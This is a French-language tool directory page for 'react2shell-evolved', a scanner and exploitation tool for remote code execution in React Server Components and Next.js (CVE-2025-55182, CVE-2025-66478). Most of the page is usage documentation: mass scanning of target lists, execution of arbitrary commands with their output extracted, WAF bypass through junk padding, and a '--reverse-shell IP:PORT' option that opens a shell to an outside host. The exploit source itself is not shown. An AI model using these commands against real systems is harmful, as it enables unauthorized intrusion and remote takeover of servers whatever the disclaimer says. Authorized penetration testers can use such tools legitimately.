Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
react2shell-evolved — Une version évoluée du scanner assetnote CVE-2025-55182 | Kitploit
Outils/GitHubGitHub/guiimoraes/react2shell-evolved
Scanners de VulnérabilitésGénération de PayloadsExploitationExploitation d'Applications WebContournement de WAFTests d'IntrusionRed TeamingOutil d'Accès à Distance
GitHubguiimoraes/react2shell-evolved

react2shell-evolved

Une version évoluée du scanner assetnote CVE-2025-55182

Voir le dépôt
215il y a 8 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

React2Shell Scanner

High Fidelity Detection for RSC/Next.js RCE

Scanner pour la détection de vulnérabilités d'exécution de code à distance (RCE) dans les applications React Server Components et Next.js.

À propos

Le React2Shell Scanner est un outil spécialisé pour identifier les vulnérabilités d'exécution de code à distance (RCE) dans les applications utilisant React Server Components (RSC) et Next.js. L'outil détecte les vulnérabilités liées aux CVEs suivants :

  • CVE-2025-55182
  • CVE-2025-66478

L'outil effectue des vérifications haute fidélité en utilisant la détection par canal auxiliaire et une preuve de concept de RCE, avec la capacité d'extraire les résultats dynamiques des commandes exécutées via l'analyse automatique des réponses HTTP.

Ceci est une version éditée par @imguimoraes du scanner original développé par l'Assetnote Security Research Team. Le PoC RCE original a été créé par @maple3142.

Caractéristiques

  • Détection haute fidélité utilisant le canal auxiliaire et PoC RCE
  • Exécution multi-thread pour un scan en masse
  • Extraction dynamique des résultats des commandes exécutées (analyse automatique des en-têtes et du corps de la réponse)
  • Contournement WAF avec des données aléatoires configurables
  • Prise en charge de Windows (PowerShell) et Linux/Unix (shell)
  • Sortie en JSON structuré pour analyse ultérieure
  • Suivi automatique des redirections
  • Interface avec barre de progression et sortie colorée

Installation

Prérequis

  • Python 3.8 ou supérieur
  • pip (gestionnaire de paquets Python)

Installation des dépendances

root@kitploit:~
pip install requests tqdm

Ou en utilisant le fichier requirements.txt :

root@kitploit:~
pip install -r requirements.txt

Utilisation

Syntaxe de base

root@kitploit:~
python scanner.py [-u URL | -l FILE] [options]

Vérifier une seule URL

root@kitploit:~
python scanner.py -u https://example.com

Vérifier plusieurs URLs

root@kitploit:~
python scanner.py -l hosts.txt

Options de ligne de commande

Options d'entrée (une obligatoire)

OptionDescription
-u, --url URLURL ou hôte unique à vérifier
-l, --list FILEFichier contenant une liste d'hôtes (un par ligne)

Options d'exécution

OptionDescription
-t, --threads NNombre de threads concurrents (défaut : 10)
--timeout SECONDESTimeout des requêtes en secondes (défaut : 10)
-k, --insecureDésactiver la vérification du certificat SSL (activé par défaut)

Options de sortie

OptionDescription
-o, --output FICHIERFichier de sortie pour les résultats au format JSON
--all-resultsEnregistrer tous les résultats dans le fichier, pas seulement les vulnérables
-v, --verboseSortie verbeuse (affiche des extraits de réponse pour analyse)
-q, --quietMode silencieux (affiche uniquement les hôtes vulnérables)
--no-colorDésactiver la sortie colorée

Options d'en-têtes

OptionDescription
-H, --header "Key: Value"Ajouter un en-tête HTTP personnalisé (peut être utilisé plusieurs fois)

Options d'exploit

OptionDescription
--safe-checkUtiliser la détection par canal auxiliaire sécurisée au lieu du PoC RCE (n'exécute pas de code)
--windowsUtiliser la charge utile PowerShell au lieu du shell Unix (pour environnements Windows)
--waf-bypassAjouter des données aléatoires à la charge utile pour contourner le WAF (défaut : 128 Ko)
--waf-bypass-size KOTaille des données aléatoires en Ko pour le contournement WAF (défaut : 128)
--payload COMMANDECommande personnalisée à exécuter dans le RCE (défaut : echo $((41*271)))
--reverse-shell IP:PORTCréer une connexion reverse shell vers IP:PORT spécifié

Exemples d'utilisation

Exemple 1 : Scan basique d'un hôte

root@kitploit:~
python scanner.py -u https://target.com

Exemple 2 : Scan en masse avec plusieurs threads

root@kitploit:~
python scanner.py -l targets.txt -t 50 --timeout 15

Exemple 3 : Scan avec sortie JSON

root@kitploit:~
python scanner.py -l targets.txt -o results.json --all-results

Exemple 4 : Scan avec en-têtes personnalisés

root@kitploit:~
python scanner.py -u https://target.com -H "Authorization: Bearer token" -H "User-Agent: CustomAgent"

Exemple 5 : Scan avec charge utile personnalisée

root@kitploit:~
python scanner.py -u https://target.com --payload "whoami"

Exemple 6 : Scan avec contournement WAF

root@kitploit:~
python scanner.py -l targets.txt --waf-bypass --waf-bypass-size 256

Exemple 7 : Scan dans un environnement Windows

root@kitploit:~
python scanner.py -u https://target.com --windows --payload "whoami"

Exemple 8 : Scan avec safe check (non invasif)

root@kitploit:~
python scanner.py -l targets.txt --safe-check

Exemple 9 : Scan verbeux complet

root@kitploit:~
python scanner.py -l targets.txt -v --all-results -o full_scan.json

Exemple 10 : Établir un reverse shell

root@kitploit:~
python scanner.py -u https://target.com --reverse-shell 192.168.1.100:4444

Format de sortie

Sortie dans le terminal

Le scanner affiche les résultats avec des codes de couleur indiquant le statut :

  • [VULNÉRABLE] - Hôte vulnérable (rouge)
  • [NON VULNÉRABLE] - Hôte non vulnérable (vert)
  • [ERREUR] - Erreur lors de la vérification (jaune)

Pour les hôtes vulnérables, le résultat de la commande exécutée est affiché lorsqu'il est disponible via l'extraction automatique de l'en-tête X-Action-Redirect ou du corps de la réponse.

Format JSON

Lorsque l'option -o est utilisée, la sortie est enregistrée au format JSON avec la structure suivante :

root@kitploit:~
{
  "scan_time": "2025-01-XXT00:00:00.000000Z",
  "total_results": 10,
  "results": [
    {
      "host": "https://target.com",
      "vulnerable": true,
      "status_code": 307,
      "final_url": "https://target.com/",
      "command_result": "11111",
      "timestamp": "2025-01-XXT00:00:00.000000Z",
      "request": "POST / HTTP/1.1\r\n...",
      "response": "HTTP/1.1 307 Temporary Redirect\r\n...",
      "error": null
    }
  ]
}

Champs du résultat :

  • vulnerable : true si vulnérable, false si non vulnérable, null si une erreur s'est produite
  • command_result : Résultat de la commande exécutée extrait de la réponse (lorsqu'il est disponible)
  • final_url : URL finale testée (après suivi des redirections si activé)
  • status_code : Code HTTP de la réponse
  • request : Requête HTTP complète envoyée
  • response : Réponse HTTP reçue (premiers 2000 caractères)
  • error : Message d'erreur s'il y en a
  • timestamp : Horodatage UTC de la vérification

Fonctionnalités techniques

Méthodes de détection

Le scanner offre deux méthodes de détection :

  1. Safe Check (--safe-check) : Détection par canal auxiliaire non invasive qui vérifie les schémas d'erreur dans la réponse sans exécuter de code. Utile pour un scan initial sans impact.
  2. PoC RCE : Exécution réelle de code à distance avec extraction dynamique des résultats. Utilise des charges utiles basées sur Node.js child_process pour l'exécution de commandes système.

Extraction des résultats

Le scanner effectue une analyse automatique des réponses HTTP pour extraire les résultats des commandes exécutées :

  • Extraction de l'en-tête X-Action-Redirect (format : NEXT_REDIRECT;push;/login?a=<result>;307;)
  • Extraction du corps de la réponse (format : E{"digest":"<result>"} ou 1:E{"digest":"<result>"})
  • Fonctionne avec n'importe quelle commande/charge utile personnalisée via le paramètre --payload

L'extraction est effectuée dynamiquement, sans dépendre de valeurs fixes, permettant de valider l'exécution de n'importe quelle commande.

Contournement WAF

Lorsque l'option --waf-bypass est utilisée :

  • Ajoute des données aléatoires (junk data) au début de la charge utile multipart/form-data
  • Taille configurable via --waf-bypass-size (défaut : 128 Ko)
  • Utile pour contourner les filtres WAF qui inspectent le contenu du corps de la requête
  • Le timeout est automatiquement augmenté à 20 secondes lorsque le contournement WAF est actif

Charges utiles personnalisées

Le paramètre --payload permet de spécifier n'importe quelle commande à exécuter :

  • Défaut : echo $((41*271)) (résultat : 11111)
  • Windows : Utilisez des commandes PowerShell lorsque --windows est actif
  • Linux/Unix : Utilisez des commandes shell standard

Le résultat de la commande est automatiquement extrait et affiché, quelle que soit la valeur retournée.

Reverse Shell

L'option --reverse-shell permet d'établir une connexion reverse shell :

  • Format : IP:PORT (exemple : 192.168.1.100:4444)
  • Utilise les modules Node.js net et child_process
  • Pour Windows : lance powershell.exe
  • Pour Linux/Unix : lance /bin/sh

Avis légaux et éthiques

Cet outil est destiné exclusivement à des fins éducatives et à des tests de sécurité autorisés.

  • Utilisez-le uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite et écrite de tester
  • L'utilisation non autorisée de cet outil est illégale et peut entraîner des poursuites pénales
  • Les développeurs déclinent toute responsabilité en cas d'utilisation abusive de cet outil
  • Obtenez toujours une autorisation écrite avant d'effectuer des tests d'intrusion
  • Respectez les lois et réglementations applicables dans votre juridiction

Crédits

Exploit original

L'exploit RCE original a été créé par @maple3142.

Scanner original

Le scanner original a été développé par l'Assetnote Security Research Team :

  • Dépôt : https://github.com/assetnote/react2shell-scanner/
  • Site web : https://www.assetnote.io/

Cette version

Cette version éditée conserve les fonctionnalités du scanner original avec des améliorations supplémentaires :

  • Extraction dynamique des résultats de commandes (analyse automatique des réponses)
  • Prise en charge des commandes personnalisées avec extraction des résultats
  • Suppression du Vercel Bypass (Patched in ??/??/2025)
  • Système de Reverse Shell (Crash-Friendly)

Édité par : guiimoraes

CVEs associés

  • CVE-2025-55182
  • CVE-2025-66478

Si vous trouvez des bogues ou avez des suggestions d'amélioration, veuillez ouvrir une issue dans le dépôt en décrivant le problème de manière détaillée.

Télécharger l’outil